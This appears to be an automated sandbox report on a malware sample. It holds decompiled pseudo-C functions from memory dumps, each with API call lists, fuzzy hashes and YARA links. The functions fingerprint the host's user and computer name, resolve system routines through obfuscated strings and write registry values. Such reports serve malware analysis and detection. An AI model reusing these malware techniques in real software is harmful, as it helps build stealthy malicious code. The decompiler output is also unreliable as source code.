GetLastError.KERNEL32(00000001), ref: 00BB5DA5

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: dd3f6de82999e90e49bd97668beb05d0f04f27cfb33c2d41500cbc10b34583ff
Instruction ID: f76aaaf08f049188b2fd7e919fd037abdcd2c8acc84a51c68b1aa1753d0de225
Opcode Fuzzy Hash: dd3f6de82999e90e49bd97668beb05d0f04f27cfb33c2d41500cbc10b34583ff
Instruction Fuzzy Hash: 2C3112B1800609AFDB21AFA4DC89EEEBBFCEF08344F1005A5F605A7121D7B49D45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BB61B9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00BB61B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xbbd2a4; // 0x2a5a5a8
				_t1 = _t9 + 0xbbe62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00BB5B16(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00BB98E4(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00BB4D6A(_t34, _t41, _a8);
						E00BB5DE8(_t41);
						_t42 = E00BBA543(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00BB5DE8(_t36);
							_t36 = _t42;
						}
						_t43 = E00BB8D06(_t36, _t33);
						if(_t43 != 0) {
							E00BB5DE8(_t36);
							_t36 = _t43;
						}
					}
					E00BB5DE8(_t28);
				}
				return _t36;
			}

0x00bb61b9
0x00bb61bc
0x00bb61bd
0x00bb61c5
0x00bb61cc
0x00bb61d3
0x00bb61d7
0x00bb61dd
0x00bb61e4
0x00bb61e9
0x00bb61fb
0x00bb61ff
0x00bb6203
0x00bb6209
0x00bb620e
0x00bb621e
0x00bb6220
0x00bb6237
0x00bb623b
0x00bb623e
0x00bb6243
0x00bb6243
0x00bb624c
0x00bb6250
0x00bb6253
0x00bb6258
0x00bb6258
0x00bb6250
0x00bb625b
0x00bb625b
0x00bb6266

APIs

Part of subcall function 00BB5B16: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,00BB61D3,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?), ref: 00BB5B7D
Part of subcall function 00BB5B16: sprintf.NTDLL ref: 00BB5B9E

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

strcpy.NTDLL ref: 00BB6203
lstrcat.KERNEL32(00000000,?), ref: 00BB620E

Part of subcall function 00BB4D6A: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00BB621D,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB4D81

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B

Part of subcall function 00BBA543: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00BB6237,00000000,?,?,00BB6028,?,036195B0), ref: 00BBA54D
Part of subcall function 00BBA543: _snprintf.NTDLL ref: 00BBA5AB

Strings

=, xrefs: 00BB6225

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 2c9d8f60108eeb6c088ccd5dc2393afbf5c6e16756c1fad42a37bd179f02543c
Instruction ID: d7c898449975427963d50d7689972e5fb40e9e6cd9c3315bb7ffb7b534efc543
Opcode Fuzzy Hash: 2c9d8f60108eeb6c088ccd5dc2393afbf5c6e16756c1fad42a37bd179f02543c
Instruction Fuzzy Hash: A611C633A015256B4A22BBB49C46DFF3BDCDF9976030501A6F605A7101DEF8CD0297A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E10DE09, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6E10DE09

Part of subcall function 6E10AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E10AF54
Part of subcall function 6E10AF51: __initp_misc_winsig.LIBCMT ref: 6E10AF6F
Part of subcall function 6E10AF51: GetModuleHandleW.KERNEL32(6E135EE8), ref: 6E110D88

__mtinitlocks.LIBCMT ref: 6E10DE0E
__mtterm.LIBCMT ref: 6E10DE17

Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E111CA5
Part of subcall function 6E10DE7F: _free.LIBCMT ref: 6E111CAC
Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL(6E13D520), ref: 6E111CCE

__calloc_crt.LIBCMT ref: 6E10DE3C
__initptd.LIBCMT ref: 6E10DE5E
GetCurrentThreadId.KERNEL32 ref: 6E10DE65

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 1551663144-0
Opcode ID: 547409bd65bb3eb13e1dd4754749d55ec658980e68e606a51e104b0157afd6b9
Instruction ID: 993a8c25632e8661ad531390bd2b64d2173732f0b2b40d816222f2ecd0542779
Opcode Fuzzy Hash: 547409bd65bb3eb13e1dd4754749d55ec658980e68e606a51e104b0157afd6b9
Instruction Fuzzy Hash: 3FF0F632509A125FE6B4BAF03C007CB3698AF2267CB214E29E474C50D4FF2084C07955

Uniqueness

Uniqueness Score: -1.00%

Function 00BB975F, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00BB97B9
SysAllocString.OLEAUT32(0070006F), ref: 00BB97CD
SysAllocString.OLEAUT32(00000000), ref: 00BB97DF
SysFreeString.OLEAUT32(00000000), ref: 00BB9847
SysFreeString.OLEAUT32(00000000), ref: 00BB9856
SysFreeString.OLEAUT32(00000000), ref: 00BB9861

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 60b4536539a9100cacd6d84ec2051d9da7371673958537dede9ac608f3d80ed9
Instruction ID: 8a69591a8757160eddac677c7dfef316d728f1f59adeb3a810fd288c83ba9edd
Opcode Fuzzy Hash: 60b4536539a9100cacd6d84ec2051d9da7371673958537dede9ac608f3d80ed9
Instruction Fuzzy Hash: 6E412135D00609ABDB01EFB8D845AEFBBBAEF49310F144465EA15EB220DBB1DD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1135FB, Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 6E113636
__invoke_watson.LIBCMT ref: 6E113690
_strlen.LIBCMT ref: 6E113644

Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752

_strnlen.LIBCMT ref: 6E1136CF
__lock.LIBCMT ref: 6E1136E0
__getenv_helper_nolock.LIBCMT ref: 6E1136EB

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
Instruction ID: 7847825165dd8bc58f23a06ed04b14069dcfbc85c04d1073d4c4b73bd0191e70
Opcode Fuzzy Hash: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
Instruction Fuzzy Hash: 74313C71A0C615AAD7119AE48C08BDE77689F15BA4F234835D824DF38CDF74CAC2A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8C20, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB8C20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00BB98E4(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xbbd2a4; // 0x2a5a5a8
					_t1 = _t23 + 0xbbe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xbbd2a4; // 0x2a5a5a8
					_t2 = _t26 + 0xbbe769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00BB5DE8(_t54);
					} else {
						_t30 =  *0xbbd2a4; // 0x2a5a5a8
						_t5 = _t30 + 0xbbe756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xbbd2a4; // 0x2a5a5a8
							_t7 = _t33 + 0xbbe40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xbbd2a4; // 0x2a5a5a8
								_t9 = _t36 + 0xbbe4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xbbd2a4; // 0x2a5a5a8
									_t11 = _t39 + 0xbbe779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00BB241F(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00bb8c2f
0x00bb8c33
0x00bb8cf5
0x00bb8c39
0x00bb8c39
0x00bb8c3e
0x00bb8c51
0x00bb8c53
0x00bb8c58
0x00bb8c60
0x00bb8c67
0x00bb8c69
0x00bb8c6e
0x00bb8ced
0x00bb8cee
0x00bb8c70
0x00bb8c70
0x00bb8c75
0x00bb8c7d
0x00bb8c7f
0x00bb8c84
0x00000000
0x00bb8c86
0x00bb8c86
0x00bb8c8b
0x00bb8c93
0x00bb8c95
0x00bb8c9a
0x00000000
0x00bb8c9c
0x00bb8c9c
0x00bb8ca1
0x00bb8ca9
0x00bb8cab
0x00bb8cb0
0x00000000
0x00bb8cb2
0x00bb8cb2
0x00bb8cb7
0x00bb8cbf
0x00bb8cc1
0x00bb8cc6
0x00000000
0x00bb8cc8
0x00bb8cce
0x00bb8cd3
0x00bb8cda
0x00bb8cdf
0x00bb8ce4
0x00000000
0x00bb8ce6
0x00bb8ce9
0x00bb8ce9
0x00bb8ce4
0x00bb8cc6
0x00bb8cb0
0x00bb8c9a
0x00bb8c84
0x00bb8c6e
0x00bb8d03

APIs

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BB5CCC,?,00000001,?,?,00000000,00000000), ref: 00BB8C45
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BB8C67
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BB8C7D
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BB8C93
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BB8CA9
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BB8CBF

Part of subcall function 00BB241F: memset.NTDLL ref: 00BB249E

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: f0a75b5c7bbb7c9d6ed805dd573e68d83d9d87ccec0b6980ab67b05d402d4254
Instruction ID: ea33aea615a47a0de242151d791c7c87a1f5bb4ed29dcc368384ce1455e34e97
Opcode Fuzzy Hash: f0a75b5c7bbb7c9d6ed805dd573e68d83d9d87ccec0b6980ab67b05d402d4254
Instruction Fuzzy Hash: 6E21DDB160164BAFDB10EF69CD84DAABBECEF0434470545A5E619CB221EFB4E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB94E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00BB94E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t85;
				void* _t95;
				void* _t96;
				char _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t96 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xbbd33c);
					_t95 = 0x80000002;
					L6:
					_t60 = E00BB8ECC(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00BB53BB(_t96, _t101, _t105, _t95, _t60) != 0) {
						L27:
						E00BB5DE8(_a8);
						goto L29;
					}
					_t65 =  *0xbbd2a4; // 0x2a5a5a8
					_t16 = _t65 + 0xbbe8fe; // 0x65696c43
					_t68 = E00BB8ECC(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t69 =  *_t29;
						_t33 = _t105 + 0x10; // 0x3d00bbc0
						if(E00BB5C3B(_t101,  *_t33, _t95, _a8,  *0xbbd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
							_t71 =  *0xbbd2a4; // 0x2a5a5a8
							if(_t102 == 0) {
								_t35 = _t71 + 0xbbea5f; // 0x4d4c4b48
								_t72 = _t35;
							} else {
								_t34 = _t71 + 0xbbe89f; // 0x55434b48
								_t72 = _t34;
							}
							if(E00BB4B3D(_t72,  *0xbbd334,  *0xbbd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t74 =  *0xbbd2a4; // 0x2a5a5a8
									_t44 = _t74 + 0xbbe871; // 0x74666f53
									_t103 = E00BB8ECC(0, _t44);
									if(_t77 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00bbc0
										E00BB9D43( *_t47, _t95, _a8,  *0xbbd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d00bbc0
										E00BB9D43( *_t49, _t95, _t103,  *0xbbd330, _a16);
										E00BB5DE8(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00bbc0
									E00BB9D43( *_t40, _t95, _a8,  *0xbbd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d00bbc0
									E00BB9D43( *_t43, _t95, _a8,  *0xbbd330, _a16);
								}
								if( *_t105 != 0) {
									E00BB5DE8(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00bbc0
					_t85 = E00BB386E( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
					if(_t85 == 0) {
						_t104 = _v16;
						if(_v12 == 0x28) {
							 *_t104 =  *_t104 & _t85;
							_t26 = _t105 + 0x10; // 0x3d00bbc0
							E00BB5C3B(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
						}
						E00BB5DE8(_t104);
						_t102 = _a16;
					}
					E00BB5DE8(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t101 = _a8;
					E00BBA899(_t102, _a8,  &_v284);
					__imp__(_t106 + _t102 - 0x117,  *0xbbd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t95 = 0x80000003;
					goto L6;
				}
			}

0x00bb94e5
0x00bb94ee
0x00bb94f5
0x00bb94fa
0x00bb9567
0x00bb956d
0x00bb9572
0x00bb957b
0x00bb9580
0x00bb9585
0x00bb96f8
0x00bb96ff
0x00bb96ff
0x00bb9704
0x00bb9706
0x00bb9706
0x00bb970f
0x00bb970f
0x00bb958b
0x00bb9597
0x00bb96ee
0x00bb96f1
0x00000000
0x00bb96f1
0x00bb959d
0x00bb95a2
0x00bb95ab
0x00bb95b0
0x00bb95b5
0x00bb95fe
0x00bb95fe
0x00bb95fe
0x00bb9611
0x00bb961b
0x00bb9621
0x00bb9628
0x00bb9632
0x00bb9632
0x00bb962a
0x00bb962a
0x00bb962a
0x00bb962a
0x00bb9654
0x00bb965c
0x00bb968a
0x00bb968f
0x00bb969d
0x00bb96a1
0x00bb96d3
0x00bb96a3
0x00bb96b0
0x00bb96b3
0x00bb96c3
0x00bb96c6
0x00bb96cc
0x00bb96cc
0x00bb965e
0x00bb966b
0x00bb966e
0x00bb9680
0x00bb9683
0x00bb9683
0x00bb96dd
0x00bb96e9
0x00bb96df
0x00bb96e2
0x00bb96e2
0x00bb96dd
0x00bb9654
0x00000000
0x00bb961b
0x00bb95c4
0x00bb95c7
0x00bb95ce
0x00bb95d4
0x00bb95d7
0x00bb95d9
0x00bb95e5
0x00bb95e8
0x00bb95e8
0x00bb95ee
0x00bb95f3
0x00bb95f3
0x00bb95f9
0x00000000
0x00bb95f9
0x00bb94ff
0x00000000
0x00bb9526
0x00bb9526
0x00bb9532
0x00bb9545
0x00bb954b
0x00bb9553
0x00000000
0x00bb9553

APIs

StrChrA.SHLWAPI(00BBA82A,0000005F,00000000,00000000,00000104), ref: 00BB9518
lstrcpy.KERNEL32(?,?), ref: 00BB9545

Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E

Part of subcall function 00BB9D43: lstrlenW.KERNEL32(?,?,?,00BB96B8,3D00BBC0,80000002,00BBA82A,00BB23DB,74666F53,4D4C4B48,00BB23DB,?,3D00BBC0,80000002,00BBA82A,?), ref: 00BB9D68

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

lstrcpy.KERNEL32(?,00000000), ref: 00BB9567

Strings

\, xrefs: 00BB954B
(, xrefs: 00BB95D0

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 59998c6e29e5189f6643aa7931ee48d8aca971766bdb74e01076b56156b3d603
Instruction ID: b63510ba73e21be26e97ea09ad4148fec8de1febd45795e4ef421d280b439431
Opcode Fuzzy Hash: 59998c6e29e5189f6643aa7931ee48d8aca971766bdb74e01076b56156b3d603
Instruction Fuzzy Hash: 44515B7150060AAFDF22AF64DD80EFA3BF9EF04310F1046A5FA1697121EBB5DA15DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA0B7, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBA0B7() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00BB98E4(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00BB5DE8(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xbb5f3a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00bba0c5
0x00bba0c8
0x00bba0cb
0x00bba0d1
0x00bba0d6
0x00bba0dc
0x00bba0e4
0x00bba0e7
0x00bba0ed
0x00bba0f2
0x00bba0ff
0x00bba10c
0x00bba110
0x00bba112
0x00bba116
0x00bba119
0x00bba129
0x00bba17c
0x00bba17d
0x00bba12b
0x00bba130
0x00bba131
0x00bba136
0x00bba139
0x00bba14c
0x00000000
0x00bba14e
0x00bba151
0x00bba156
0x00bba164
0x00bba167
0x00bba16d
0x00bba172
0x00000000
0x00bba174
0x00bba174
0x00bba177
0x00bba177
0x00bba172
0x00bba14c
0x00bba182
0x00bba183
0x00bba0f2
0x00bba189

APIs

GetUserNameW.ADVAPI32(00000000,00BB5F38), ref: 00BBA0CB
GetComputerNameW.KERNEL32(00000000,00BB5F38), ref: 00BBA0E7

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

GetUserNameW.ADVAPI32(00000000,00BB5F38), ref: 00BBA121
GetComputerNameW.KERNEL32(00BB5F38,?), ref: 00BBA144
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00BB5F38,00000000,00BB5F3A,00000000,00000000,?,?,00BB5F38), ref: 00BBA167

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: f5acca8e962ddb9fab510b1f1eea5dfe72159b4196c2b7726a5b255a0150c10b
Instruction ID: b273f43a1dde76bf14bbbf71a852ae9a5fddf8586c658a924f11e1d97f1b56f6
Opcode Fuzzy Hash: f5acca8e962ddb9fab510b1f1eea5dfe72159b4196c2b7726a5b255a0150c10b
Instruction Fuzzy Hash: D121E5B6D00208FBCB11DFA8C9849EEBBB8EF49344B5045AAE601E7200DA70AB44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E11282C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E112838

Part of subcall function 6E108902: __FF_MSGBANNER.LIBCMT ref: 6E108919
Part of subcall function 6E108902: __NMSG_WRITE.LIBCMT ref: 6E108920
Part of subcall function 6E108902: RtlAllocateHeap.NTDLL(6E24E9EC,00000000,00000001), ref: 6E108945

_free.LIBCMT ref: 6E11284B

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 7b41e353e8db42efcda0d530ab58a16d9a5f9b85386c47308628241094915c8d
Instruction ID: 957b0b36752524cb789c3c819980b3da50b24a406ccddb4a92aae05da15f8f19
Opcode Fuzzy Hash: 7b41e353e8db42efcda0d530ab58a16d9a5f9b85386c47308628241094915c8d
Instruction Fuzzy Hash: 1A11A731508615EFDB65AFF5A844ECA37ECAF16364B204939E9589B184DF3488C1F750

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA2D9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBA2D9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00BB6108(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00BBA96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xbbd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x00bba2d9
0x00bba2e6
0x00bba2e8
0x00bba34b
0x00000000
0x00bba34b
0x00bba300
0x00bba307
0x00bba313
0x00bba318
0x00bba31a
0x00bba31c
0x00bba31e
0x00bba320
0x00bba322
0x00bba32e
0x00bba33e
0x00000000
0x00bba330
0x00bba330
0x00bba337
0x00bba344
0x00bba344
0x00bba344
0x00bba337
0x00bba32e
0x00bba349
0x00000000
0x00000000
0x00bba34f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA313
ResetEvent.KERNEL32(?), ref: 00BBA318
GetLastError.KERNEL32 ref: 00BBA330
GetLastError.KERNEL32(?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA34B

